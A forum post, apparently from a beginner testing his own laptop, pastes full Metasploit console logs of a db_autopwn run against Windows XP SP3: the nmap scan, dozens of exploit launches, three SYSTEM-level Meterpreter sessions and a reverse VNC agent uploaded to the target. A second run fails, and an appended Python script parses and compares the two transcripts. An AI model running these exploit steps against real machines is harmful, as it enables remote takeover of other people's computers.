Hi everyone,
I finally managed to carry out a successful attack using Metasploit's autopwn function from a laptop running BT4 r2 against an Acer Aspire One with Windows XP SP3, both connected over Wi-Fi to the same access point.

The problem is that I tried to repeat the attack a few days later (after having switched off both computers) under (I believe) the same identical conditions as the previous day (only the IPs changed), but the attack did not succeed.

Now, working in research as a biochemist at a university, I am used to thinking scientifically, so, according to the well-known "scientific method", if I run an experiment on day X and get certain results, running the same experiment on day Y under the same conditions, I expect to get the same results.

Evidently something does not add up... I would like to understand why the second attack, carried out with the same steps, did not work.

I tried autopwn because, being a beginner, I am not yet able to recognise and interpret the possible vulnerabilities detected by the nmap scan, let alone decide which exploits are worth using against those vulnerabilities...
I know that good practice would be to first understand the vulnerabilities and then decide the attack to use based on them... I searched the web, but so far I have only found a few examples about old vulnerabilities and their exploits, which never worked in my case.
I would like to know whether there is a complete guide (understandable to a novice ;-)) of the kind: port X, service Y: use exploits A, B, C.

The most important thing of all:
...obviously I would also like to know whether there is a way to find out which of the exploits in my autopwn run worked (no fewer than 3 sessions were opened) and how they did it.

I am posting here the scenario and the output of both attacks:
Attacker: Samsung R450 with BT4 r2 connected over Wi-Fi to my access point.
Target: Acer Aspire One with Windows XP SP3, XP firewall DISABLED, connected over Wi-Fi to my AP.

first attack:

Code:
ATTACK 1

msf > db_driver mysql
[*] Using database driver mysql

msf > db_connect root:toor@127.0.0.1/prova



msf > db_nmap 192.168.0.2 --osscan-guess -sV
[*] Nmap: Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-05-03 19:36 UTC
[*] Nmap: Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
[*] Nmap: Nmap done: 1 IP address (0 hosts up) scanned in 0.33 seconds
msf > db_nmap 192.168.0.2 --osscan-guess -sV -Pn
[*] Nmap: Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-05-03 19:37 UTC
[*] Nmap: Nmap scan report for 192.168.0.2
[*] Nmap: Host is up (0.046s latency).
[*] Nmap: Not shown: 996 closed ports
[*] Nmap: PORT     STATE SERVICE      VERSION
[*] Nmap: 135/tcp  open  msrpc        Microsoft Windows RPC
[*] Nmap: 139/tcp  open  netbios-ssn
[*] Nmap: 445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: 2869/tcp open  http         Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
[*] Nmap: MAC Address: 00:23:4E:2E:FC:C4 (Hon Hai Precision Ind. Co.)
[*] Nmap: Service Info: OS: Windows
[*] Nmap: Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 11.47 seconds

msf > db_hosts

Hosts
=====

address      mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------      ---                ----  -------  ---------  -----  -------  ----  --------
192.168.0.2  00:23:4E:2E:FC:C4        Unknown                    device

msf > db_autopwn -x -e -p -R great
[*] (1/101 [0 sessions]): Launching exploit/linux/http/ddwrt_cgibin_exec against 192.168.0.2:2869...
[*] (2/101 [0 sessions]): Launching exploit/windows/http/hp_nnm_getnnmdata_maxage against 192.168.0.2:2869...
[*] (3/101 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.0.2:139...
[*] (4/101 [0 sessions]): Launching exploit/windows/http/adobe_robohelper_authbypass against 192.168.0.2:2869...

......snip.....
[*] (99/101 [0 sessions]): Launching exploit/unix/webapp/openx_banner_edit against 192.168.0.2:2869...
[*] (100/101 [0 sessions]): Launching exploit/unix/webapp/tikiwiki_graph_formula_exec against 192.168.0.2:2869...
[*] (101/101 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.0.2:445...
[*] (101/101 [0 sessions]): Waiting on 28 launched modules to finish execution...
[*] (101/101 [0 sessions]): Waiting on 14 launched modules to finish execution...
[*] (101/101 [0 sessions]): Waiting on 12 launched modules to finish execution...
[*] Meterpreter session 2 opened (192.168.0.3:34499 -> 192.168.0.2:32906) at Tue May 03 19:48:17 +0000 2011
[*] Meterpreter session 3 opened (192.168.0.3:39483 -> 192.168.0.2:9261) at Tue May 03 19:48:18 +0000 2011
[*] Meterpreter session 4 opened (192.168.0.3:32993 -> 192.168.0.2:27406) at Tue May 03 19:48:18 +0000 2011
[*] (101/101 [3 sessions]): Waiting on 8 launched modules to finish execution...
[*] (101/101 [3 sessions]): Waiting on 8 launched modules to finish execution...

.....snip.....
[*] (101/101 [3 sessions]): Waiting on 1 launched modules to finish execution...
[*] (101/101 [3 sessions]): Waiting on 0 launched modules to finish execution...


msf > sessions -i

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ ACER-88B18F6E0B  192.168.0.3:34499 -> 192.168.0.2:32906
  3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ ACER-88B18F6E0B  192.168.0.3:39483 -> 192.168.0.2:9261
  4   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ ACER-88B18F6E0B  192.168.0.3:32993 -> 192.168.0.2:27406

msf > sessions -i 2
[*] Starting interaction with 2...


meterpreter > ps

Process list
============

 PID   Name                       Arch  Session  User                           Path
 ---   ----                       ----  -------  ----                           ----
 0     [System Process]
 4     System                     x86   0        NT AUTHORITY\SYSTEM
 632   smss.exe                   x86   0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 680   csrss.exe                  x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 704   winlogon.exe               x86   0        NT AUTHORITY\SYSTEM            \??
....snip......

C:\WINDOWS\system32\wuauclt.exe
 3396  cmd.exe                    x86   0        ACER-88B18F6E0B\stefano        C:\WINDOWS\system32\cmd.exe
 1132  svchost.exe                x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.0.3 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\DAlZOGPWel.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.0.3:4545...

meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "acer-88b18f6e0b"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage
Same machine: preferring raw encoding
ShmCleanup called

meterpreter > exit
second attack:

Code:
ATTACK 2

msf > db_driver mysql
[*] Using database driver mysql

msf > db_connect root:toor@127.0.0.1/prova1
msf > db_hosts

Hosts
=====

address  mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------  ---  ----  -------  ---------  -----  -------  ----  --------

msf > db_nmap 192.168.0.7 -sV --osscan-guess -Pn
[*] Nmap: Starting Nmap 5.35DC1 ( http://nmap.org ) at 2011-05-05 11:53 UTC
[*] Nmap: Nmap scan report for 192.168.0.7
[*] Nmap: Host is up (0.41s latency)
[*] Nmap: Not shown: 996 closed ports
[*] Nmap: PORT     STATE SERVICE      VERSION
[*] Nmap: 135/tcp  open  msrpc        Microsoft Windows RPC
[*] Nmap: 139/tcp  open  netbios-ssn
[*] Nmap: 445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: 2869/tcp open  http         Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
[*] Nmap: MAC Address: 00:23:4E:2E:FC:C4 (Hon Hai Precision Ind. Co.)
[*] Nmap: Service Info: OS: Windows
[*] Nmap: Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.78 seconds

msf > db_hosts

Hosts
=====

address      mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------      ---                ----  -------  ---------  -----  -------  ----  --------
192.168.0.7  00:23:4E:2E:FC:C4        Unknown                    device

msf > db_autopwn -x -e -p -R great

[*] (1/100 [0 sessions]): Launching exploit/unix/webapp/coppermine_piceditor against 192.168.0.7:2869...

....snip....
[*] (100/100 [0 sessions]): Waiting on 0 launched modules to finish execution...

msf >
Thanks in advance,
...please be patient (and exhaustive) with newbies!
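As an added example (not part of the original post and not Metasploit's own code), here is a small Python script that parses a db_autopwn console transcript like the two quoted above and summarizes what such a transcript can and cannot tell you: how many modules were selected, how they were spread across the target's open ports, which sessions opened, and how two runs differ. The sample transcript strings are constructed from abbreviated excerpts of the post's output, and the function names summarize and compare_runs are my own.

```python
import re
from collections import Counter

# Constructed sample: abbreviated lines in the shape of the msfconsole
# transcripts quoted in the post (most "Launching" lines are omitted).
ATTACK_1 = """\
msf > db_autopwn -x -e -p -R great
[*] (1/101 [0 sessions]): Launching exploit/linux/http/ddwrt_cgibin_exec against 192.168.0.2:2869...
[*] (2/101 [0 sessions]): Launching exploit/windows/http/hp_nnm_getnnmdata_maxage against 192.168.0.2:2869...
[*] (3/101 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.0.2:139...
[*] (101/101 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.0.2:445...
[*] Meterpreter session 2 opened (192.168.0.3:34499 -> 192.168.0.2:32906) at Tue May 03 19:48:17 +0000 2011
[*] Meterpreter session 3 opened (192.168.0.3:39483 -> 192.168.0.2:9261) at Tue May 03 19:48:18 +0000 2011
[*] (101/101 [3 sessions]): Waiting on 0 launched modules to finish execution...
"""

ATTACK_2 = """\
msf > db_autopwn -x -e -p -R great
[*] (1/100 [0 sessions]): Launching exploit/unix/webapp/coppermine_piceditor against 192.168.0.7:2869...
[*] (100/100 [0 sessions]): Waiting on 0 launched modules to finish execution...
"""

# "(n/total [k sessions]): Launching <module> against <ip>:<port>..."
LAUNCH_RE = re.compile(
    r"\((\d+)/(\d+) \[\d+ sessions\]\): Launching (\S+) against ([\d.]+):(\d+)"
)
# "Meterpreter session <id> opened (<local> -> <remote>) at ..."
# Note that this line names no module: only the connection tuple is logged.
SESSION_RE = re.compile(r"Meterpreter session (\d+) opened \((\S+) -> (\S+)\)")


def summarize(transcript):
    """Extract module count, modules per target port and opened sessions."""
    total = None
    per_port = Counter()
    modules = []
    sessions = []
    for line in transcript.splitlines():
        m = LAUNCH_RE.search(line)
        if m:
            total = int(m.group(2))           # the "/101" part: modules selected
            modules.append(m.group(3))
            per_port[int(m.group(5))] += 1    # which open port the module targeted
            continue
        s = SESSION_RE.search(line)
        if s:
            sessions.append({"id": int(s.group(1)),
                             "local": s.group(2),
                             "remote": s.group(3)})
    return {"total": total, "per_port": dict(per_port),
            "modules": modules, "sessions": sessions}


def compare_runs(first, second):
    """List the differences worth checking before calling two runs identical."""
    a, b = summarize(first), summarize(second)
    diffs = []
    if a["total"] != b["total"]:
        diffs.append(f"module count differs: {a['total']} vs {b['total']}")
    only_a = sorted(set(a["modules"]) - set(b["modules"]))
    only_b = sorted(set(b["modules"]) - set(a["modules"]))
    if only_a:
        diffs.append(f"modules only in first run: {len(only_a)}")
    if only_b:
        diffs.append(f"modules only in second run: {len(only_b)}")
    if len(a["sessions"]) != len(b["sessions"]):
        diffs.append(
            f"sessions opened: {len(a['sessions'])} vs {len(b['sessions'])}"
        )
    return diffs


if __name__ == "__main__":
    for name, run in (("attack 1", ATTACK_1), ("attack 2", ATTACK_2)):
        s = summarize(run)
        print(name, "modules:", s["total"], "per port:", s["per_port"],
              "sessions:", [x["id"] for x in s["sessions"]])
    for d in compare_runs(ATTACK_1, ATTACK_2):
        print("difference:", d)
```

Run against the two transcripts quoted above, the comparison already surfaces one difference the post does not mention: the first run selected 101 modules and the second 100, so the two runs did not launch the same set of modules even though the scan results look identical. The session lines also show why the post's last question cannot be answered from this output alone: each "Meterpreter session N opened" line records only the connection tuple, not the module that produced it. A full, unsnipped transcript of both runs is needed for the module-by-module comparison that compare_runs performs.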